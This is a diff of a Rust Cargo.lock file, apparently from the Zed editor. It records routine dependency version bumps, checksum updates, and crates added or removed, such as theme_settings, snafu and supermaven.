"registry+https://github.com/rust-lang/crates.io-index" -checksum = "f6cc0c81648b20b70c491ff8cce00c1c3b223bb8ed2b5d41f0e54c6c4c0a3594" +checksum = "5bcdef0be6fe7f6fa333b1073c949729274b05f123a0ad7efcb8efd878e5c3b1" dependencies = [ "globset", "sha2", @@ -14645,7 +14975,7 @@ dependencies = [ "errno 0.3.14", "libc", "linux-raw-sys 0.11.0", - "windows-sys 0.59.0", + "windows-sys 0.61.2", ] [[package]] @@ -14804,6 +15134,18 @@ version = "1.0.22" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "b39cdef0fa800fc44525c84ccb54a029961a8215f9619753635a9c0d2538d46d" +[[package]] +name = "rusty-fork" +version = "0.3.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "cc6bf79ff24e648f6da1f8d1f011e9cac26491b619e6b9280f2b47f1774e6ee2" +dependencies = [ + "fnv", + "quick-error 1.2.3", + "tempfile", + "wait-timeout", +] + [[package]] name = "rustybuzz" version = "0.20.1" @@ -14880,7 +15222,7 @@ dependencies = [ "backtrace", "chrono", "flume", - "futures 0.3.31", + "futures 0.3.32", "parking_lot", "rand 0.9.2", "web-time", @@ -14898,6 +15240,7 @@ dependencies = [ "serde_json", "settings", "theme", + "theme_settings", ] [[package]] @@ -14923,7 +15266,7 @@ dependencies = [ "proc-macro2", "quote", "serde_derive_internals", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -14984,7 +15327,7 @@ checksum = "1783eabc414609e28a5ba76aee5ddd52199f7107a0b24c2e9746a1ecc34a683d" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -15013,7 +15356,7 @@ dependencies = [ "proc-macro-error2", "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -15055,7 +15398,7 @@ dependencies = [ "proc-macro2", "quote", "sea-bae", - "syn 2.0.106", + "syn 2.0.117", "unicode-ident", ] @@ -15104,16 +15447,16 @@ dependencies = [ "any_vec", "anyhow", "bitflags 2.10.0", - "client", "collections", "editor", "fs", - "futures 0.3.31", + "futures 0.3.32", "gpui", "itertools 0.14.0", "language", "lsp", 
"menu", + "multi_buffer", "pretty_assertions", "project", "serde", @@ -15121,6 +15464,7 @@ dependencies = [ "settings", "smol", "theme", + "theme_settings", "tracing", "ui", "unindent", @@ -15145,6 +15489,15 @@ dependencies = [ "zeroize", ] +[[package]] +name = "secrecy" +version = "0.10.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "e891af845473308773346dc847b2c23ee78fe442e0472ac50e22a18a93d3ae5a" +dependencies = [ + "zeroize", +] + [[package]] name = "security-framework" version = "2.11.1" @@ -15240,7 +15593,7 @@ checksum = "d540f220d3187173da220f885ab66608367b6574e925011a9353e4badda91d79" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -15251,7 +15604,7 @@ checksum = "18d26a20a969b9e3fdf2fc2d9f21eda6c40e2de84c9408bb5d3b05d499aae711" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -15309,7 +15662,7 @@ checksum = "175ee3e80ae9982737ca543e96133087cbd9a485eecc3bc4de9c1a37b47ea59c" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -15385,7 +15738,7 @@ dependencies = [ "collections", "ec4rs", "fs", - "futures 0.3.31", + "futures 0.3.32", "gpui", "indoc", "inventory", @@ -15414,7 +15767,7 @@ version = "0.1.0" dependencies = [ "anyhow", "collections", - "derive_more 0.99.20", + "derive_more", "gpui", "log", "schemars", @@ -15449,24 +15802,23 @@ version = "0.1.0" dependencies = [ "quote", "settings", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] name = "settings_profile_selector" version = "0.1.0" dependencies = [ - "client", "editor", "fuzzy", "gpui", - "language", "menu", "picker", "project", "serde_json", "settings", "theme", + "theme_settings", "ui", "workspace", "zed_actions", @@ -15479,9 +15831,7 @@ dependencies = [ "agent", "agent_settings", "anyhow", - "assets", "audio", - "client", "codestral", "component", "copilot", @@ -15490,8 +15840,9 @@ dependencies = [ "edit_prediction", "edit_prediction_ui", 
"editor", + "feature_flags", "fs", - "futures 0.3.31", + "futures 0.3.32", "fuzzy", "gpui", "heck 0.5.0", @@ -15499,13 +15850,11 @@ dependencies = [ "language", "log", "menu", - "node_runtime", "paths", "picker", "platform_title_bar", "pretty_assertions", "project", - "recent_projects", "regex", "release_channel", "rodio", @@ -15513,18 +15862,18 @@ dependencies = [ "search", "serde", "serde_json", - "session", "settings", "shell_command_parser", "strum 0.27.2", "telemetry", "theme", + "theme_settings", "title_bar", "ui", "util", "workspace", "zed_actions", - "zlog", + "zed_credentials_provider", ] [[package]] @@ -15633,22 +15982,36 @@ name = "sidebar" version = "0.1.0" dependencies = [ "acp_thread", + "action_log", + "agent", + "agent-client-protocol", + "agent_settings", "agent_ui", + "anyhow", "chrono", "editor", "feature_flags", "fs", - "fuzzy", + "git", "gpui", - "picker", + "language_model", + "menu", + "platform_title_bar", + "pretty_assertions", "project", + "prompt_store", "recent_projects", + "remote", + "serde", + "serde_json", "settings", "theme", + "theme_settings", "ui", - "ui_input", "util", + "vim_mode_setting", "workspace", + "zed_actions", ] [[package]] @@ -15787,13 +16150,6 @@ version = "0.4.11" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "7a2ae44ef20feb57a68b23d846850f861394c2e02dc425a50098ae8c90267589" -[[package]] -name = "slash_commands_example" -version = "0.1.0" -dependencies = [ - "zed_extension_api 0.1.0", -] - [[package]] name = "slotmap" version = "1.0.7" @@ -15820,7 +16176,7 @@ checksum = "0eb01866308440fc64d6c44d9e86c5cc17adfe33c4d6eed55da9145044d0ffc1" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -15846,6 +16202,27 @@ version = "0.3.5" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "0f7a918bd2a9951d18ee6e48f076843e8e73a9a5d22cf05bcd4b7a81bdd04e17" +[[package]] +name = "snafu" +version = "0.8.9" +source = 
"registry+https://github.com/rust-lang/crates.io-index" +checksum = "6e84b3f4eacbf3a1ce05eac6763b4d629d60cbc94d632e4092c54ade71f1e1a2" +dependencies = [ + "snafu-derive", +] + +[[package]] +name = "snafu-derive" +version = "0.8.9" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "c1c97747dbf44bb1ca44a561ece23508e99cb592e862f22222dcf42f51d1e451" +dependencies = [ + "heck 0.5.0", + "proc-macro2", + "quote", + "syn 2.0.117", +] + [[package]] name = "snippet" version = "0.1.0" @@ -15862,7 +16239,7 @@ dependencies = [ "collections", "extension", "fs", - "futures 0.3.31", + "futures 0.3.32", "gpui", "indoc", "parking_lot", @@ -15941,9 +16318,9 @@ dependencies = [ [[package]] name = "spirv" -version = "0.3.0+sdk-1.3.268.0" +version = "0.4.0+sdk-1.4.341.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "eda41003dc44290527a59b13432d4a0379379fa074b70174882adfbdfd917844" +checksum = "d9571ea910ebd84c86af4b3ed27f9dbdc6ad06f17c5f96146b2b671e2976744f" dependencies = [ "bitflags 2.10.0", ] @@ -15968,19 +16345,13 @@ dependencies = [ "der 0.7.10", ] -[[package]] -name = "sptr" -version = "0.3.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3b9b39299b249ad65f3b7e96443bad61c02ca5cd3589f46cb6d610a0fd6c0d6a" - [[package]] name = "sqlez" version = "0.1.0" dependencies = [ "anyhow", "collections", - "futures 0.3.31", + "futures 0.3.32", "indoc", "libsqlite3-sys", "log", @@ -15998,7 +16369,7 @@ version = "0.1.0" dependencies = [ "sqlez", "sqlformat", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -16075,7 +16446,7 @@ dependencies = [ "quote", "sqlx-core", "sqlx-macros-core", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -16098,7 +16469,7 @@ dependencies = [ "sqlx-mysql", "sqlx-postgres", "sqlx-sqlite", - "syn 2.0.106", + "syn 2.0.117", "tokio", "url", ] @@ -16228,9 +16599,9 @@ checksum = "6ce2be8dc25455e1f91df71bfa12ad37d7af1092ae736f3a6cd0e37bc7810596" [[package]] name = "stacker" 
-version = "0.1.22" +version = "0.1.23" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e1f8b29fb42aafcea4edeeb6b2f2d7ecd0d969c48b4cf0d2e64aafc471dd6e59" +checksum = "08d74a23609d509411d10e2176dc2a4346e3b4aea2e7b1869f19fdedbc71c013" dependencies = [ "cc", "cfg-if", @@ -16257,7 +16628,7 @@ checksum = "172175341049678163e979d9107ca3508046d4d2a7c6682bee46ac541b17db69" dependencies = [ "proc-macro-error2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -16299,6 +16670,7 @@ dependencies = [ "story", "strum 0.27.2", "theme", + "theme_settings", "title_bar", "ui", ] @@ -16388,7 +16760,16 @@ version = "0.27.2" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "af23d6f6c1a224baef9d3f61e287d2761385a5b88fdab4eb4c6f11aeb54c4bcf" dependencies = [ - "strum_macros", + "strum_macros 0.27.2", +] + +[[package]] +name = "strum" +version = "0.28.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9628de9b8791db39ceda2b119bbe13134770b56c138ec1d3af810d045c04f9bd" +dependencies = [ + "strum_macros 0.28.0", ] [[package]] @@ -16400,7 +16781,19 @@ dependencies = [ "heck 0.5.0", "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", +] + +[[package]] +name = "strum_macros" +version = "0.28.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ab85eea0270ee17587ed4156089e10b9e6880ee688791d45a905f5b1ca36f664" +dependencies = [ + "heck 0.5.0", + "proc-macro2", + "quote", + "syn 2.0.117", ] [[package]] @@ -16413,9 +16806,10 @@ checksum = "13c2bddecc57b384dee18652358fb23172facb8a2c51ccc10d74c157bdea3292" name = "sum_tree" version = "0.1.0" dependencies = [ - "arrayvec", "ctor", + "heapless", "log", + "proptest", "rand 0.9.2", "rayon", "tracing", @@ -16423,49 +16817,6 @@ dependencies = [ "ztracing", ] -[[package]] -name = "supermaven" -version = "0.1.0" -dependencies = [ - "anyhow", - "client", - "collections", - "edit_prediction_types", - "editor", - "env_logger 
0.11.8", - "futures 0.3.31", - "gpui", - "http_client", - "language", - "log", - "postage", - "project", - "serde", - "serde_json", - "settings", - "smol", - "supermaven_api", - "text", - "theme", - "ui", - "unicode-segmentation", - "util", -] - -[[package]] -name = "supermaven_api" -version = "0.1.0" -dependencies = [ - "anyhow", - "futures 0.3.31", - "http_client", - "paths", - "serde", - "serde_json", - "smol", - "util", -] - [[package]] name = "sval" version = "2.15.0" @@ -16744,9 +17095,9 @@ dependencies = [ [[package]] name = "syn" -version = "2.0.106" +version = "2.0.117" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ede7c438028d4436d71104916910f5bb611972c5cfd7f89b8300a8186e6fada6" +checksum = "e665b8803e7b1d2a727f4023456bbbbe74da67099c585258af0ad9c5013b9b99" dependencies = [ "proc-macro2", "quote", @@ -16785,7 +17136,16 @@ checksum = "728a70f3dbaf5bab7f0c4b1ac8d7ae5ea60a4b5549c8a5914361c99147a709d2" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", +] + +[[package]] +name = "syntax_theme" +version = "0.1.0" +dependencies = [ + "gpui", + "serde", + "serde_json", ] [[package]] @@ -16901,13 +17261,26 @@ version = "6.2.2" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "a3e535eb8dded36d55ec13eddacd30dec501792ff23a0b1682c38601b8cf2349" dependencies = [ - "cfg-expr", + "cfg-expr 0.15.8", "heck 0.5.0", "pkg-config", "toml 0.8.23", "version-compare", ] +[[package]] +name = "system-deps" +version = "7.0.7" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "48c8f33736f986f16d69b6cb8b03f55ddcad5c41acc4ccc39dd88e84aa805e7f" +dependencies = [ + "cfg-expr 0.20.6", + "heck 0.5.0", + "pkg-config", + "toml 0.9.8", + "version-compare", +] + [[package]] name = "system-interface" version = "0.27.3" @@ -16943,13 +17316,11 @@ dependencies = [ name = "tab_switcher" version = "0.1.0" dependencies = [ - "anyhow", "collections", "ctor", "editor", "fuzzy", "gpui", - 
"language", "menu", "picker", "project", @@ -16959,6 +17330,7 @@ dependencies = [ "settings", "smol", "theme", + "theme_settings", "ui", "util", "workspace", @@ -17025,7 +17397,7 @@ version = "0.1.0" dependencies = [ "anyhow", "collections", - "futures 0.3.31", + "futures 0.3.32", "gpui", "hex", "log", @@ -17072,7 +17444,7 @@ dependencies = [ name = "telemetry" version = "0.1.0" dependencies = [ - "futures 0.3.31", + "futures 0.3.32", "serde", "serde_json", "telemetry_events", @@ -17097,7 +17469,7 @@ dependencies = [ "getrandom 0.3.4", "once_cell", "rustix 1.1.2", - "windows-sys 0.59.0", + "windows-sys 0.61.2", ] [[package]] @@ -17127,7 +17499,7 @@ dependencies = [ "alacritty_terminal", "anyhow", "collections", - "futures 0.3.31", + "futures 0.3.32", "gpui", "itertools 0.14.0", "libc", @@ -17138,12 +17510,12 @@ dependencies = [ "release_channel", "schemars", "serde", - "serde_json", "settings", "smol", "sysinfo 0.37.2", "task", "theme", + "theme_settings", "thiserror 2.0.17", "url", "urlencoding", @@ -17167,15 +17539,13 @@ name = "terminal_view" version = "0.1.0" dependencies = [ "anyhow", - "assistant_slash_command", "async-recursion", "breadcrumbs", - "client", "collections", "db", "dirs 4.0.0", "editor", - "futures 0.3.31", + "futures 0.3.32", "gpui", "itertools 0.14.0", "language", @@ -17183,7 +17553,6 @@ dependencies = [ "menu", "pretty_assertions", "project", - "rand 0.9.2", "regex", "schemars", "serde", @@ -17193,6 +17562,7 @@ dependencies = [ "task", "terminal", "theme", + "theme_settings", "ui", "util", "workspace", @@ -17208,7 +17578,6 @@ dependencies = [ "collections", "ctor", "gpui", - "http_client", "log", "parking_lot", "postage", @@ -17227,11 +17596,8 @@ version = "0.1.0" dependencies = [ "anyhow", "collections", - "derive_more 0.99.20", - "fs", - "futures 0.3.31", + "derive_more", "gpui", - "log", "palette", "parking_lot", "refineable", @@ -17239,10 +17605,9 @@ dependencies = [ "serde", "serde_json", "serde_json_lenient", - "settings", "strum 
0.27.2", + "syntax_theme", "thiserror 2.0.17", - "util", "uuid", ] @@ -17255,6 +17620,7 @@ dependencies = [ "fs", "gpui", "theme", + "theme_settings", ] [[package]] @@ -17274,6 +17640,7 @@ dependencies = [ "simplelog", "strum 0.27.2", "theme", + "theme_settings", "vscode_theme", ] @@ -17290,10 +17657,31 @@ dependencies = [ "settings", "telemetry", "theme", - "ui", - "util", - "workspace", - "zed_actions", + "theme_settings", + "ui", + "util", + "workspace", + "zed_actions", +] + +[[package]] +name = "theme_settings" +version = "0.1.0" +dependencies = [ + "anyhow", + "collections", + "gpui", + "gpui_util", + "log", + "palette", + "refineable", + "schemars", + "serde", + "serde_json", + "serde_json_lenient", + "settings", + "theme", + "uuid", ] [[package]] @@ -17322,7 +17710,7 @@ checksum = "4fee6c4efc90059e10f81e6d42c60a18f76588c3d74cb83a0b242a2b6c7504c1" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -17333,7 +17721,7 @@ checksum = "3ff15c8ecd7de3849db632e14d18d2571fa09dfc5ed93479bc4485c7a517c913" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -17354,7 +17742,7 @@ dependencies = [ "fax", "flate2", "half", - "quick-error", + "quick-error 2.0.1", "weezl", "zune-jpeg", ] @@ -17367,7 +17755,7 @@ dependencies = [ "anyhow", "base64 0.22.1", "bstr", - "fancy-regex", + "fancy-regex 0.16.2", "lazy_static", "regex", "rustc-hash 1.1.0", @@ -17414,6 +17802,7 @@ dependencies = [ "core-foundation-sys", "sys-locale", "time", + "windows 0.61.3", ] [[package]] @@ -17453,15 +17842,14 @@ dependencies = [ [[package]] name = "tiny_http" -version = "0.8.2" +version = "0.12.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9ce51b50006056f590c9b7c3808c3bd70f0d1101666629713866c227d6e58d39" +checksum = "389915df6413a2e74fb181895f933386023c71110878cd0825588928e64cdc82" dependencies = [ "ascii", - "chrono", "chunked_transfer", + "httpdate", "log", - "url", ] [[package]] @@ 
-17510,19 +17898,18 @@ dependencies = [ "chrono", "client", "cloud_api_types", - "collections", "db", - "feature_flags", "git_ui", "gpui", - "http_client", + "icons", + "livekit_client", "notifications", "platform_title_bar", - "pretty_assertions", "project", "recent_projects", "release_channel", "remote", + "remote_connection", "rpc", "schemars", "semver", @@ -17532,7 +17919,6 @@ dependencies = [ "story", "telemetry", "theme", - "tree-sitter-md", "ui", "util", "windows 0.61.3", @@ -17576,7 +17962,7 @@ checksum = "af407857209536a95c8e56f8231ef2c2e2aff839b22e07a1ffcbc617e9db9fa5" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -17659,17 +18045,18 @@ dependencies = [ [[package]] name = "tokio-tungstenite" -version = "0.26.2" +version = "0.28.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7a9daff607c6d2bf6c16fd681ccb7eecc83e4e2cdc1ca067ffaadfca5de7f084" +checksum = "d25a406cddcc431a75d3d9afc6a7c0f7428d4891dd973e4d54c56b46127bf857" dependencies = [ "futures-util", "log", "rustls 0.23.33", + "rustls-native-certs 0.8.2", "rustls-pki-types", "tokio", "tokio-rustls 0.26.2", - "tungstenite 0.26.2", + "tungstenite 0.28.0", ] [[package]] @@ -17794,7 +18181,7 @@ dependencies = [ "anyhow", "convert_case 0.8.0", "editor", - "futures 0.3.31", + "futures 0.3.32", "fuzzy", "gpui", "language", @@ -17840,8 +18227,10 @@ dependencies = [ "pin-project-lite", "sync_wrapper 1.0.2", "tokio", + "tokio-util", "tower-layer", "tower-service", + "tracing", ] [[package]] @@ -17879,6 +18268,7 @@ dependencies = [ "tower 0.5.2", "tower-layer", "tower-service", + "tracing", ] [[package]] @@ -17913,7 +18303,7 @@ checksum = "7490cfa5ec963746568740651ac6781f701c9c5ea257c58e057f3ba8cf69e8da" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -17997,18 +18387,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = 
"2fb391ac70462b3097a755618fbf9c8f95ecc1eb379a414f7b46f202ed10db1f" dependencies = [ "cc", - "windows-targets 0.48.5", -] - -[[package]] -name = "trait-variant" -version = "0.1.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "70977707304198400eb4835a78f6a9f928bf41bba420deb8fdb175cd965d77a7" -dependencies = [ - "proc-macro2", - "quote", - "syn 2.0.106", + "windows-targets 0.52.6", ] [[package]] @@ -18023,9 +18402,9 @@ dependencies = [ [[package]] name = "tree-sitter" -version = "0.26.3" +version = "0.26.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "974d205cc395652cfa8b37daa053fe56eebd429acf8dc055503fee648dae981e" +checksum = "887bd495d0582c5e3e0d8ece2233666169fa56a9644d172fc22ad179ab2d0538" dependencies = [ "cc", "regex", @@ -18228,9 +18607,9 @@ dependencies = [ [[package]] name = "tree-sitter-rust" -version = "0.24.0" +version = "0.24.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4b9b18034c684a2420722be8b2a91c9c44f2546b631c039edf575ccba8c61be1" +checksum = "439e577dbe07423ec2582ac62c7531120dbfccfa6e5f92406f93dd271a120e45" dependencies = [ "cc", "tree-sitter-language", @@ -18325,9 +18704,9 @@ dependencies = [ [[package]] name = "tungstenite" -version = "0.26.2" +version = "0.27.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4793cb5e56680ecbb1d843515b23b6de9a75eb04b66643e256a396d43be33c13" +checksum = "eadc29d668c91fcc564941132e17b28a7ceb2f3ebf0b9dae3e03fd7a6748eb0d" dependencies = [ "bytes 1.11.1", "data-encoding", @@ -18344,9 +18723,9 @@ dependencies = [ [[package]] name = "tungstenite" -version = "0.27.0" +version = "0.28.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "eadc29d668c91fcc564941132e17b28a7ceb2f3ebf0b9dae3e03fd7a6748eb0d" +checksum = "8628dcc84e5a09eb3d8423d6cb682965dea9133204e8fb3efee74c2a0c259442" dependencies = [ "bytes 1.11.1", "data-encoding", @@ -18361,12 +18740,6 @@ dependencies 
= [ "utf-8", ] -[[package]] -name = "typed-path" -version = "0.11.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c462d18470a2857aa657d338af5fa67170bb48bcc80a296710ce3b0802a32566" - [[package]] name = "typeid" version = "1.0.3" @@ -18435,18 +18808,17 @@ dependencies = [ "documented", "gpui", "gpui_macros", + "gpui_util", "icons", "itertools 0.14.0", "menu", "schemars", "serde", - "settings", "smallvec", "story", "strum 0.27.2", "theme", "ui_macros", - "util", "windows 0.61.3", ] @@ -18465,7 +18837,7 @@ version = "0.1.0" dependencies = [ "component", "quote", - "syn 2.0.106", + "syn 2.0.117", "ui", ] @@ -18477,11 +18849,17 @@ dependencies = [ "markdown", "menu", "settings", - "theme", + "theme_settings", "ui", "workspace", ] +[[package]] +name = "unarray" +version = "0.1.4" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "eaea85b334db583fe3274d12b4cd1880032beab409c0d774be044d4480ab9a94" + [[package]] name = "unicase" version = "2.8.1" @@ -18682,12 +19060,11 @@ dependencies = [ "command-fds", "dirs 4.0.0", "dunce", - "futures 0.3.31", + "futures 0.3.32", "futures-lite 1.13.0", "git2", "globset", "gpui_util", - "indoc", "itertools 0.14.0", "libc", "log", @@ -18720,7 +19097,7 @@ version = "0.1.0" dependencies = [ "perf", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -18832,7 +19209,6 @@ name = "vim" version = "0.1.0" dependencies = [ "anyhow", - "assets", "async-compat", "async-trait", "collections", @@ -18841,7 +19217,7 @@ dependencies = [ "db", "editor", "env_logger 0.11.8", - "futures 0.3.31", + "futures 0.3.32", "fuzzy", "git_ui", "gpui", @@ -18872,7 +19248,7 @@ dependencies = [ "task", "text", "theme", - "title_bar", + "theme_settings", "tokio", "ui", "util", @@ -18886,6 +19262,7 @@ dependencies = [ name = "vim_mode_setting" version = "0.1.0" dependencies = [ + "gpui", "settings", ] @@ -18938,6 +19315,15 @@ dependencies = [ "serde", ] +[[package]] +name = "wait-timeout" +version = 
"0.2.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "09ac3b126d3914f9849036f826e054cbabdc8519970b8998ddaf3b5bd3c65f11" +dependencies = [ + "libc", +] + [[package]] name = "waker-fn" version = "1.2.0" @@ -19023,9 +19409,9 @@ checksum = "b8dad83b4f25e74f184f64c43b150b91efe7647395b42289f38e50566d82855b" [[package]] name = "wasm-bindgen" -version = "0.2.104" +version = "0.2.113" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c1da10c01ae9f1ae40cbfac0bac3b1e724b320abfcf52229f80b547c0d250e2d" +checksum = "60722a937f594b7fde9adb894d7c092fc1bb6612897c46368d18e7a20208eff2" dependencies = [ "cfg-if", "once_cell", @@ -19034,27 +19420,14 @@ dependencies = [ "wasm-bindgen-shared", ] -[[package]] -name = "wasm-bindgen-backend" -version = "0.2.104" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "671c9a5a66f49d8a47345ab942e2cb93c7d1d0339065d4f8139c486121b43b19" -dependencies = [ - "bumpalo", - "log", - "proc-macro2", - "quote", - "syn 2.0.106", - "wasm-bindgen-shared", -] - [[package]] name = "wasm-bindgen-futures" -version = "0.4.54" +version = "0.4.63" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7e038d41e478cc73bae0ff9b36c60cff1c98b8f38f8d7e8061e79ee63608ac5c" +checksum = "8a89f4650b770e4521aa6573724e2aed4704372151bd0de9d16a3bbabb87441a" dependencies = [ "cfg-if", + "futures-util", "js-sys", "once_cell", "wasm-bindgen", @@ -19063,9 +19436,9 @@ dependencies = [ [[package]] name = "wasm-bindgen-macro" -version = "0.2.104" +version = "0.2.113" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7ca60477e4c59f5f2986c50191cd972e3a50d8a95603bc9434501cf156a9a119" +checksum = "0fac8c6395094b6b91c4af293f4c79371c163f9a6f56184d2c9a85f5a95f3950" dependencies = [ "quote", "wasm-bindgen-macro-support", @@ -19073,22 +19446,22 @@ dependencies = [ [[package]] name = "wasm-bindgen-macro-support" -version = "0.2.104" +version = "0.2.113" source 
= "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9f07d2f20d4da7b26400c9f4a0511e6e0345b040694e8a75bd41d578fa4421d7" +checksum = "ab3fabce6159dc20728033842636887e4877688ae94382766e00b180abac9d60" dependencies = [ + "bumpalo", "proc-macro2", "quote", - "syn 2.0.106", - "wasm-bindgen-backend", + "syn 2.0.117", "wasm-bindgen-shared", ] [[package]] name = "wasm-bindgen-shared" -version = "0.2.104" +version = "0.2.113" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "bad67dc8b2a1a6e5448428adec4c3e84c43e561d8c9ee8a9e5aabeb193ec41d1" +checksum = "de0e091bdb824da87dc01d967388880d017a0a9bc4f3bdc0d86ee9f9336e3bb5" dependencies = [ "unicode-ident", ] @@ -19124,12 +19497,12 @@ dependencies = [ [[package]] name = "wasm-encoder" -version = "0.229.0" +version = "0.236.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "38ba1d491ecacb085a2552025c10a675a6fddcbd03b1fc9b36c536010ce265d2" +checksum = "724fccfd4f3c24b7e589d333fc0429c68042897a7e8a5f8694f31792471841e7" dependencies = [ "leb128fmt", - "wasmparser 0.229.0", + "wasmparser 0.236.1", ] [[package]] @@ -19208,7 +19581,7 @@ version = "0.3.3" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "b7516db7f32decdadb1c3b8deb1b7d78b9df7606c5cc2f6241737c2ab3a0258e" dependencies = [ - "futures 0.3.31", + "futures 0.3.32", "js-sys", "wasm-bindgen", "web-sys", @@ -19252,9 +19625,9 @@ dependencies = [ [[package]] name = "wasmparser" -version = "0.229.0" +version = "0.236.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "0cc3b1f053f5d41aa55640a1fa9b6d1b8a9e4418d118ce308d20e24ff3575a8c" +checksum = "a9b1e81f3eb254cf7404a82cee6926a4a3ccc5aad80cc3d43608a070c67aa1d7" dependencies = [ "bitflags 2.10.0", "hashbrown 0.15.5", @@ -19277,22 +19650,22 @@ dependencies = [ [[package]] name = "wasmprinter" -version = "0.229.0" +version = "0.236.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = 
"d25dac01892684a99b8fbfaf670eb6b56edea8a096438c75392daeb83156ae2e" +checksum = "2df225df06a6df15b46e3f73ca066ff92c2e023670969f7d50ce7d5e695abbb1" dependencies = [ "anyhow", "termcolor", - "wasmparser 0.229.0", + "wasmparser 0.236.1", ] [[package]] name = "wasmtime" -version = "33.0.2" +version = "36.0.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "57373e1d8699662fb791270ac5dfac9da5c14f618ecf940cdb29dc3ad9472a3c" +checksum = "6a2f8736ddc86e03a9d0e4c477a37939cfc53cd1b052ee38a3133679b87ef830" dependencies = [ - "addr2line 0.24.2", + "addr2line", "anyhow", "async-trait", "bitflags 2.10.0", @@ -19306,10 +19679,9 @@ dependencies = [ "log", "mach2 0.4.3", "memfd", - "object 0.36.7", + "object", "once_cell", "postcard", - "psm", "pulley-interpreter", "rayon", "rustix 1.1.2", @@ -19317,82 +19689,109 @@ dependencies = [ "serde", "serde_derive", "smallvec", - "sptr", "target-lexicon 0.13.3", - "trait-variant", - "wasmparser 0.229.0", - "wasmtime-asm-macros", - "wasmtime-component-macro", - "wasmtime-component-util", - "wasmtime-cranelift", + "wasmparser 0.236.1", "wasmtime-environ", - "wasmtime-fiber", - "wasmtime-jit-icache-coherence", - "wasmtime-math", - "wasmtime-slab", - "wasmtime-versioned-export-macros", - "wasmtime-winch", - "windows-sys 0.59.0", + "wasmtime-internal-asm-macros", + "wasmtime-internal-component-macro", + "wasmtime-internal-component-util", + "wasmtime-internal-cranelift", + "wasmtime-internal-fiber", + "wasmtime-internal-jit-debug", + "wasmtime-internal-jit-icache-coherence", + "wasmtime-internal-math", + "wasmtime-internal-slab", + "wasmtime-internal-unwinder", + "wasmtime-internal-versioned-export-macros", + "wasmtime-internal-winch", + "windows-sys 0.60.2", ] [[package]] -name = "wasmtime-asm-macros" -version = "33.0.2" +name = "wasmtime-c-api-impl" +version = "36.0.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "bd0fc91372865167a695dc98d0d6771799a388a7541d3f34e939d0539d6583de" 
